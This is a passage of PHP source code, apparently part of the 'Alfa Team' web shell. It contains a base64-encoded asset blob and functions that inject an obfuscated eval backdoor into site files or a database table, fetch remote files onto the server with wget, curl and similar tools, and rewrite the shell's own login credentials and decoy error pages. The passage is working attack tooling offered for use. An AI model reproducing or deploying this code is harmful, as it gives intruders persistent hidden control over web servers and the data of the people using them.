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';
1368. return 'data:image/png;base64,' . __get_resource($s[$r]);
1369. }
1370. function alfainbackdoor()
1371. {
1372. alfahead();
1373. echo '<div class=header><center><p><div class="txtfont_header">| Install BackDoor |</div></p><h3><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'file\')">| In File | </a><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'db\')">| In DataBase | </a></h3></center>';
1374. $error = '<font color="red">Error In Inject BackDoor...!<br>File Loader is not Writable Or Not Exists...!</font>';
1375. $success = '<font color="green">Success...!';
1376. $textarea = "<div style='display:none;' id='backdoor_textarea'><div class='txtfont'>Your Shell:</div><p><textarea name='shell' rows='19' cols='103'><?php\n\techo('Alfa Team is Here...!');\n?></textarea></p></div>";
1377. $select = "<div class='txtfont'>Use:</div> <select name='method' style='width:155px;' onChange='inBackdoor(this);'><option value='alfa'>Alfa Team Uploader</option><option value='my'>My Private Shell</option></select>";
1378. $cwd = 'Example: /home/alfa/public_html/index.php';
1379. if ($_POST['alfa1'] == 'file')
1380. {
1381. echo ("<center><p><div class='txtfont_header'>| In File |</div></p><p><form onsubmit=\"g('inbackdoor',null,'file',this.method.value,this.file.value,this.shell.value,this.key.value);return false;\">{$select} <div class='txtfont'>Backdoor Loader:</div> <input type='text' name='file' size='50' placeholder='{$cwd}'> <div class='txtfont'>Key: </div> <input type='text' name='key' size='10' value='alfa'> <input type='submit' value=' '>{$textarea}</form></p></center>");
1382. if ($_POST['alfa2'] != '' && $_POST['alfa3'] != '' && $_POST['alfa4'] != '')
1383. {
1384. $method = $_POST['alfa2'];
1385. $file = $_POST['alfa3'];
1386. $shell = $_POST['alfa4'];
1387. $key = str_replace(array(
1388. '"',
1389. '\''
1390. ) , '', trim($_POST['alfa5']));
1391. if ($key == '') $key = 'alfa';
1392. if ($method == 'my')
1393. {
1394. $shell = __ZW5jb2Rlcg($shell);
1395. }
1396. else
1397. {
1398. $shell = $GLOBALS['__ALFA_SHELL_CODE'];
1399. }
1400. $code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="' . $key . '"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x("' . $shell . '");exit;}?>';
1401. if (@is_file($file) && @is_writable($file))
1402. {
1403. @file_put_contents($file, $code . "\n" . @file_get_contents($file));
1404. __alert($success . "<br>Run With: " . basename($file) . "?alfa=" . $key . '</font>');
1405. }
1406. else
1407. {
1408. __alert($error);
1409. }
1410. }
1411. }
1412. if ($_POST['alfa1'] == 'db')
1413. {
1414. echo ("<center><p><div class='txtfont_header'>| In DataBase |</div></p>" . getConfigHtml('all') . "<p><form onsubmit=\"g('inbackdoor',null,'db',this.db_host.value,this.db_username.value,this.db_password.value,this.db_name.value,this.file.value,this.method.value,this.shell.value,this.key.value);return false;\">");
1415. $table = array(
1416. 'td1' => array(
1417. 'color' => 'FFFFFF',
1418. 'tdName' => 'db_host : ',
1419. 'inputName' => 'db_host',
1420. 'id' => 'db_host',
1421. 'inputValue' => 'localhost',
1422. 'inputSize' => '50'
1423. ) ,
1424. 'td2' => array(
1425. 'color' => 'FFFFFF',
1426. 'tdName' => 'db_username : ',
1427. 'inputName' => 'db_username',
1428. 'id' => 'db_user',
1429. 'inputValue' => '',
1430. 'inputSize' => '50'
1431. ) ,
1432. 'td3' => array(
1433. 'color' => 'FFFFFF',
1434. 'tdName' => 'db_password : ',
1435. 'inputName' => 'db_password',
1436. 'id' => 'db_pw',
1437. 'inputValue' => '',
1438. 'inputSize' => '50'
1439. ) ,
1440. 'td4' => array(
1441. 'color' => 'FFFFFF',
1442. 'tdName' => 'db_name : ',
1443. 'inputName' => 'db_name',
1444. 'id' => 'db_name',
1445. 'inputValue' => '',
1446. 'inputSize' => '50'
1447. ) ,
1448. 'td5' => array(
1449. 'color' => 'FFFFFF',
1450. 'tdName' => 'Backdoor Loader: ',
1451. 'inputName' => 'file',
1452. 'inputValue' => $cwd,
1453. 'inputSize' => '50',
1454. 'placeholder' => true
1455. ) ,
1456. 'td6' => array(
1457. 'color' => 'FFFFFF',
1458. 'tdName' => 'Key: ',
1459. 'inputName' => 'key',
1460. 'inputValue' => 'alfa',
1461. 'inputSize' => '50'
1462. )
1463. );
1464. create_table($table);
1465. echo ("<p>{$select}</p>");
1466. echo ($textarea);
1467. echo ("<p><input type='submit' value=' '></p></form></p></center>");
1468. if ($_POST['alfa2'] != '' && $_POST['alfa3'] != '' && $_POST['alfa5'] != '' && $_POST['alfa6'] != '')
1469. {
1470. $dbhost = $_POST['alfa2'];
1471. $dbuser = $_POST['alfa3'];
1472. $dbpw = $_POST['alfa4'];
1473. $dbname = $_POST['alfa5'];
1474. $file = $_POST['alfa6'];
1475. $method = $_POST['alfa7'];
1476. $shell = $_POST['alfa8'];
1477. $key = str_replace(array(
1478. '"',
1479. '\''
1480. ) , '', trim($_POST['alfa9']));
1481. if ($key == '') $key = 'alfa';
1482. if ($method == 'my')
1483. {
1484. $shell = __ZW5jb2Rlcg($shell);
1485. }
1486. else
1487. {
1488. $shell = $GLOBALS['__ALFA_SHELL_CODE'];
1489. }
1490. if ($conn = mysqli_connect($dbhost, $dbuser, $dbpw, $dbname))
1491. {
1492. $code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="' . $key . '"){$conn=mysqli_connect("' . str_replace('"', '\"', $dbhost) . '","' . str_replace('"', '\"', $dbuser) . '","' . str_replace('"', '\"', $dbpw) . '","' . str_replace('"', '\"', $dbname) . '");$q=mysqli_query($conn,"SELECT `code` FROM alfa_bc LIMIT 0,1");$r=mysqli_fetch_assoc($q);$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x($r["code"]);exit;}?>';
1493. if (@is_file($file) && @is_writable($file))
1494. {
1495. @mysqli_query($conn, 'DROP TABLE `alfa_bc`');
1496. @mysqli_query($conn, 'CREATE TABLE `alfa_bc` (code LONGTEXT)');
1497. @mysqli_query($conn, 'INSERT INTO `alfa_bc` VALUES("' . $shell . '")');
1498. @file_put_contents($file, $code . "\n" . @file_get_contents($file));
1499. __alert($success . "<br>Run With: " . basename($file) . "?alfa=" . $key . '</font>');
1500. }
1501. else
1502. {
1503. __alert($error);
1504. }
1505. }
1506. }
1507. }
1508. echo ('</div>');
1509. alfafooter();
1510. }
1511. function alfawhois()
1512. {
1513. echo ("<div class='header'><center><p><div class='txtfont_header'>| Whois |</div></p><p><form onsubmit=\"g('whois',null,this.url.value,'>>');return false;\"><div class='txtfont'>Url: </div> <input type='text' name='url' style='text-align:center;' size='50' placeholder='google.com'> <input type='submit' value=' '></form></p></center>");
1514. if ($_POST['alfa2'] == '>>' && !empty($_POST['alfa1']))
1515. {
1516. $site = str_replace(array(
1517. 'http://',
1518. 'https://',
1519. 'www.',
1520. 'ftp://'
1521. ) , '', $_POST['alfa1']);
1522. $target = 'http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain=' . $site;
1523. $data = @file_get_contents($target);
1524. if ($data == '')
1525. {
1526. $get = new AlfaCURL();
1527. $get->ssl = true;
1528. $data = $get->Send($target);
1529. }
1530. $target = @json_decode($data, true);
1531. echo __pre();
1532. if (is_array($target))
1533. {
1534. echo ($target["whois_raw"]);
1535. }
1536. else
1537. {
1538. echo alfaEx("whois " . $site);
1539. }
1540. }
1541. echo ("</div>");
1542. }
1543. function alfaremotedl()
1544. {
1545. alfahead();
1546. echo ("<div class='header'><center><p><div class='txtfont_header'>| Upload From Url |</div></p><p><form onsubmit=\"g('remotedl',null,this.d.value,this.p.value,'>>');return false;\"><p><div class='txtfont'>Url: </div>&nbsp;&nbsp;&nbsp;<input type='text' name='d' size='50'></p><div class='txtfont'>Path:</div> <input type='text' name='p' size='50' value='" . $GLOBALS['cwd'] . "'><p><input type='submit' value=' '></p></form></p></center>");
1547. if (isset($_POST['alfa1'], $_POST['alfa2'], $_POST['alfa3']) && !empty($_POST['alfa1']) && $_POST['alfa3'] == '>>')
1548. {
1549. echo __pre();
1550. $url = $_POST['alfa1'];
1551. $path = $_POST['alfa2'];
1552. echo ('<center>');
1553. if (__download($url, $path))
1554. {
1555. echo ('<font color="green">Success...!</font>');
1556. }
1557. else
1558. {
1559. echo ('<font color="red">Error...!</font>');
1560. }
1561. echo ('</center>');
1562. }
1563. echo ("</div>");
1564. alfafooter();
1565. }
1566. function __download($url, $path = false)
1567. {
1568. if (!preg_match("/[a-z]+:\/\/.+/", $url)) return false;
1569. $saveas = basename(rawurldecode($url));
1570. if ($path)
1571. {
1572. $saveas = $path . $saveas;
1573. }
1574. if ($content = __read_file($url))
1575. {
1576. if (@is_file($saveas)) @unlink($saveas);
1577. if (__write_file($saveas, $content))
1578. {
1579. return true;
1580. }
1581. }
1582. $buff = alfaEx("wget " . $url . " -O " . $saveas);
1583. if (@is_file($saveas)) return true;
1584. $buff = alfaEx("curl " . $url . " -o " . $saveas);
1585. if (@is_file($saveas)) return true;
1586. $buff = alfaEx("lwp-download " . $url . " " . $saveas);
1587. if (@is_file($saveas)) return true;
1588. $buff = alfaEx("lynx -source " . $url . " > " . $saveas);
1589. if (@is_file($saveas)) return true;
1590. $buff = alfaEx("GET " . $url . " > " . $saveas);
1591. if (@is_file($saveas)) return true;
1592. $buff = alfaEx("links -source " . $url . " > " . $saveas);
1593. if (@is_file($saveas)) return true;
1594. $buff = alfaEx("fetch -o " . $saveas . " -p " . $url);
1595. if (@is_file($saveas)) return true;
1596. return false;
1597. }
1598. function clean_string($string)
1599. {
1600. if (function_exists("iconv"))
1601. {
1602. $s = trim($string);
1603. $s = iconv("UTF-8", "UTF-8//IGNORE", $s);
1604. }
1605. return $s;
1606. }
1607. function __read_file($file, $boom = true)
1608. {
1609. $content = false;
1610. if ($fh = @fopen($file, "rb"))
1611. {
1612. $content = "";
1613. while (!feof($fh))
1614. {
1615. $content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192);
1616. }
1617. }
1618. if (empty($content) || !$content)
1619. {
1620. $content = alfaEx("cat '" . addslashes($file) . "'");
1621. }
1622. return $content;
1623. }
1624. function alfaSettings()
1625. {
1626. alfahead();
1627. echo '<div class=header><center><p><div class="txtfont_header">| Settings |</div></p><h3><a href=javascript:void(0) onclick="g(\'settings\',null,null,null,null,null,null,null,null,\'main\')">| Generall Setting | </a><a href=javascript:void(0) onclick="g(\'settings\',null,null,null,null,null,null,null,null,\'color\')">| Change Color | </a></h3></center>';
1628. if ($_POST["alfa8"] == "main")
1629. {
1630. echo '<p><center><div class="txtfont_header">| Settings |</div></p><form onSubmit="reloadSetting(this);return false;" method=\'post\'>';
1631. $lg_array = array(
1632. '0' => 'No',
1633. '1' => 'Yes'
1634. );
1635. $penc_array = array(
1636. 'false' => 'No',
1637. 'true' => 'Yes'
1638. );
1639. $protect_html = "";
1640. $icon_html = "";
1641. $postEnc_html = "";
1642. $login_html = "";
1643. foreach ($lg_array as $key => $val) $protect_html .= '<option value="' . $key . '" ' . ($GLOBALS['DB_NAME']['safemode'] == '1' ? 'selected' : '') . '>' . $val . '</option>';
1644. foreach ($lg_array as $key => $val) $icon_html .= '<option value="' . $key . '" ' . ($GLOBALS['DB_NAME']['show_icons'] == '1' ? 'selected' : '') . '>' . $val . '</option>';
1645. foreach ($penc_array as $key => $val) $postEnc_html .= '<option value="' . $key . '" ' . (!empty($_POST['alfa7']) && $_POST['alfa7'] == $key ? "selected" : (__ALFA_POST_ENCRYPTION__ && empty($_POST['alfa7']) ? 'selected' : '')) . '>' . $val . '</option>';
1646. $lg_array = array(
1647. "gui" => "GUI",
1648. "500" => "500 Internal Server Error",
1649. "403" => "403 Forbidden",
1650. "404" => "404 NotFound"
1651. );
1652. foreach ($lg_array as $key => $val) $login_html .= '<option value="' . $key . '" ' . ($GLOBALS['DB_NAME']['login_page'] == $key ? 'selected' : '') . '>' . $val . '</option>';
1653. echo '';
1654. echo '<table border="1"><tbody><tr><td><div class="tbltxt" style="color:#FFFFFF">Protect:</div></td><td><select name="protect" style="width:100%;">' . $protect_html . '</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Post Encryption:</div></td><td><select name="post_encrypt" style="width:100%;">' . $postEnc_html . '</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Show Icons:</div></td><td><select name="icon" style="width:100%;">' . $icon_html . '</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">login Page:</div></td><td><select style="width:100%;" name="lgpage">' . $login_html . '</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">UserName:</div></td><td><input type="text" style="width:95%;" name="username" value="' . (empty($_POST['alfa3']) ? $GLOBALS['DB_NAME']['user'] : $_POST['alfa3']) . '" placeholder="solevisible"></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Password:</div></td><td><input type="text" style="width:95%;" name="password" placeholder="*****"></td></tr></tbody></table><input type="hidden" name="e" value="' . $GLOBALS['DB_NAME']['safemode'] . '"><input type="hidden" name="s" value="' . $GLOBALS['DB_NAME']['show_icons'] . '"><p><input type="submit" name="btn" value=" "></p></form></center>';
1655. if ($_POST['alfa5'] == '>>')
1656. {
1657. echo __pre();
1658. if (!empty($_POST['alfa3']))
1659. {
1660. $protect = $_POST['alfa1'];
1661. $lgpage = $_POST['alfa2'];
1662. $username = $_POST['alfa3'];
1663. $password = md5($_POST['alfa4']);
1664. $icon = $_POST['alfa6'];
1665. $post_encrypt = $_POST['alfa7'];
1666. @chdir($GLOBALS['home_cwd']);
1667. $basename = @basename($_SERVER['PHP_SELF']);
1668. $data = @file_get_contents($basename);
1669. $find_user = '/\'' . $GLOBALS['DB_NAME']["user_rand"] . '\'(.*?),/i';
1670. $find_pw = '/\'' . $GLOBALS['DB_NAME']["pass_rand"] . '\'(.*?),/i';
1671. $find_lg = '/\'' . $GLOBALS['DB_NAME']["login_page_rand"] . '\'(.*?),/i';
1672. $find_p = '/\'' . $GLOBALS['DB_NAME']["safemode_rand"] . '\'(.*?),/i';
1673. $icons = '/\'' . $GLOBALS['DB_NAME']["show_icons_rand"] . '\'(.*?),/i';
1674. $postEnc = '/\'' . $GLOBALS['DB_NAME']["post_encryption_rand"] . '\'(.*?),/i';
1675. if (!empty($username) && preg_match($find_user, $data, $e))
1676. {
1677. $new = '\'' . $GLOBALS['DB_NAME']["user_rand"] . '\' => \'' . $username . '\',';
1678. $data = str_replace($e[0], $new, $data);
1679. }
1680. if (!empty($_POST['alfa4']) && preg_match($find_pw, $data, $e))
1681. {
1682. $new = '\'' . $GLOBALS['DB_NAME']["pass_rand"] . '\' => \'' . $password . '\',';
1683. $data = str_replace($e[0], $new, $data);
1684. }
1685. if (!empty($lgpage) && preg_match($find_lg, $data, $e))
1686. {
1687. $new = '\'' . $GLOBALS['DB_NAME']["login_page_rand"] . '\' => \'' . $lgpage . '\',';
1688. $data = str_replace($e[0], $new, $data);
1689. }
1690. if (!empty($find_p) && preg_match($find_p, $data, $e))
1691. {
1692. $new = '\'' . $GLOBALS['DB_NAME']["safemode_rand"] . '\' => \'' . $protect . '\',';
1693. $data = str_replace($e[0], $new, $data);
1694. }
1695. if (preg_match($icons, $data, $e))
1696. {
1697. $new = '\'' . $GLOBALS['DB_NAME']["show_icons_rand"] . '\' => \'' . $icon . '\',';
1698. $data = str_replace($e[0], $new, $data);
1699. }
1700. if (preg_match($postEnc, $data, $e))
1701. {
1702. $new = '\'' . $GLOBALS['DB_NAME']["post_encryption_rand"] . '\' => ' . $post_encrypt . ',';
1703. $data = str_replace($e[0], $new, $data);
1704. }
1705. if (@file_put_contents($basename, $data))
1706. {
1707. echo '<b>UserName: </b><font color="green"><b>' . $username . '</b></font><br /><b>Password: </b><font color="green"><b>' . $_POST['alfa4'] . '</b></font><script>post_encryption_mode = ' . $post_encrypt . ';</script>';
1708. }
1709. else
1710. {
1711. __alert("<span style='color:red;'>File has no edit access...!</span>");
1712. }
1713. }
1714. else
1715. {
1716. __alert("<span style='color:red;'>UserName is Empty !</span>");
1717. }
1718. }
1719. }
1720. elseif ($_POST["alfa8"] == "color")
1721. {
1722. echo ('<center><p><div class="txtfont_header">| Custom Color |</div></p><form onSubmit="reloadColors();return false;" method=\'post\'>');
1723. echo '<table border="1"><tbody>';
1724. $template = '<tr><td style="text-align:center;"><a href="http://solevisible.com/customcolors/{help}.png" target="_blank"><font color="#00FF00">Help</font></a></td><td style="text-align:center;"><div class="tbltxt">{index}</div></td><td><div class="tbltxt" style="margin-left:5px;">{target}:</div></td><td><input style="width:60px;" multi="{multi}" id="gui_{target}" onChange="colorHandler(this);" target=".{target}" type="color" value="{color}"></td><td><input type="text" style="text-align:center;" multi="{multi}" onkeyup="colorHandlerKey(this);" target=".{target}" id="input_{target}" class="colors_input" placeholder="#ffffff" value="{color}"></td></tr>';
1725. $x = 1;
1726. foreach ($GLOBALS['__ALFA_COLOR__'] as $key => $value)
1727. {
1728. $multi = "";
1729. if (is_array($value))
1730. {
1731. if (isset($value["multi_selector"]))
1732. {
1733. $multi = __ZW5jb2Rlcg(json_encode($value));
1734. }
1735. }
1736. $value = alfa_getColor($key);
1737. $help = strtolower(str_replace(array(
1738. ":",
1739. "+"
1740. ) , array(
1741. "_",
1742. "_plus"
1743. ) , $key));
1744. echo str_replace(array(
1745. "{index}",
1746. "{target}",
1747. "{color}",
1748. "{multi}",
1749. "{help}"
1750. ) , array(
1751. $x++,
1752. $key,
1753. $value,
1754. $multi,
1755. $help
1756. ) , $template);
1757. }
1758. echo '<tr><td style="text-align:center;">-</td><td style="text-align:center;"><div class="tbltxt">*</div></td><td><div style="margin-left:5px;" class="tbltxt">Use Default Color:</div></td><td></td><td><center><input type="checkbox" id="use_default_color" value="1"></center></td></tr>';
1759. echo '</tbody></table><p><input type="submit" name="btn" value=" "></p></form><p><button style="padding:4px;;margin-right:20px;" onclick="$(\'importFileBtn\').click();" class="button"> Import </button> <button style="padding:4px;margin-left:20px;" onclick="g(\'settings\',null,null,null,null,null,null,null,\'export\',\'color\')" class="button"> Export </button></center></p>';
1760. if ($_POST['alfa7'] == 'export')
1761. {
1762. echo __pre();
1763. $colors = is_array($GLOBALS["DB_NAME"]["color"]) ? $GLOBALS["DB_NAME"]["color"] : array();
1764. $glob_colors = $GLOBALS["__ALFA_COLOR__"];
1765. $array = array();
1766. foreach ($glob_colors as $k => $v)
1767. {
1768. if (isset($colors[$k]) && !empty($colors[$k]) && !$is_default)
1769. {
1770. $v = trim($colors[$k]);
1771. }
1772. else
1773. {
1774. $v = trim(is_array($v) ? $v["key_color"] : $v);
1775. }
1776. $array[$k] = $v;
1777. }
1778. $file = "alfa_color_config_" . date('Y-m-d-h_i_s') . ".conf";
1779. $config = json_encode($array, JSON_PRETTY_PRINT);
1780. if (!@file_put_contents($file, $config))
1781. {
1782. echo ('<p><center>Color Config:<br><br><textarea rows="12" cols="70" type="text">' . $config . '</textarea></center></p>');
1783. }
1784. else
1785. {
1786. echo ('<h3><p><center><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\'' . $file . '\', \'download\')"><font color="#0F0">Download Config</font></a></center></p></h3>');
1787. }
1788. }
1789. if ($_POST['alfa2'] == '>>')
1790. {
1791. echo __pre();
1792. $colors = json_decode($_POST["alfa1"], true);
1793. $array = "";
1794. $is_default = isset($_POST["alfa3"]) && $_POST["alfa3"] == "1" ? true : false;
1795. $glob_colors = $GLOBALS["__ALFA_COLOR__"];
1796. foreach ($glob_colors as $k => $v)
1797. {
1798. if (isset($colors[$k]) && !empty($colors[$k]) && !$is_default)
1799. {
1800. $v = trim($colors[$k]);
1801. }
1802. else
1803. {
1804. $v = trim(is_array($v) ? $v["key_color"] : $v);
1805. }
1806. $array .= '"' . trim($k) . '" => "' . $v . '",';
1807. }
1808. @chdir($GLOBALS['home_cwd']);
1809. $basename = @basename($_SERVER['PHP_SELF']);
1810. $data = @file_get_contents($basename);
1811. $color = '/\'color\'(.*?)\),/s';
1812. if (preg_match($color, $data, $e))
1813. {
1814. $new = "'color' => array(" . $array . "),";
1815. $data = str_replace($e[0], $new, $data);
1816. if (@file_put_contents($basename, $data))
1817. {
1818. echo ("<center><p><h3>[+] Success...</h3></p></center><script>location.reload();</script>");
1819. }
1820. else
1821. {
1822. echo ("<center><p><h3>[-] We Not have permission to Edit shell...!</h3></p></center>");
1823. }
1824. }
1825. else
1826. {
1827. echo ("<center><p><h3>[-] Error...!</h3></p></center>");
1828. }
1829. }
1830. }
1831. echo ('</div>');
1832. alfafooter();
1833. }
1834. function alfaplus()
1835. {
1836. alfahead();
